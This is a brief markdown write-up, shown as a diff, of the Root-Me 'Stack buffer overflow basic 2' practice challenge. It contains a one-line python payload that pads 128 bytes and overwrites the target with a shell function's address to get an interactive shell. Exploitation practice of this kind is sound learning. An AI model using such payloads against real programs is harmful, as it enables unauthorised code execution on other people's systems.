aditya697/pwn/root_me.md

 # ***STACK BUFFER OVERFLOW BASIC 2***

-From the given the challenge we give the buffer value as 128 and here if we send the address of the shell we get the shell
+From the given the challenge we give the buffer value as 128 and here if we need to call the shell function.

+Then we get the interactive shell

 ```cat <(python -c "print 'A' * 128 + '\x16\x85\x04\x08'") - | ./ch15```